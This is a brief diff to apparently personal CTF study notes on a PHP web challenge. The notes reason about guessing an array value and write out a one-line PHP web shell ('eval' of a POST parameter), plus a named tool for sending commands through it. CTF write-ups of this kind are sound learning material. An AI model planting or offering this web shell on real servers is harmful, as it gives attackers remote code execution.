NeonHo/CSMLNotebook/CTF/Web入门/5-PHP features.md

 ## Hypothesis
 - As the probability's perspective, $1$ has bigger probability than the other numbers in `$allow`, so that we assign `1` to `n`.
 - `content` should be the one-sentence Trojan Horse. `<?php @eval($_POST['cmd']); ?>`
-- Then we can use a tool to run the hack command through `cmd`.
+- Then we can use the [AntSword](https://www.yuque.com/antswordproject/antsword/srruro#) to run the hack command through `cmd`.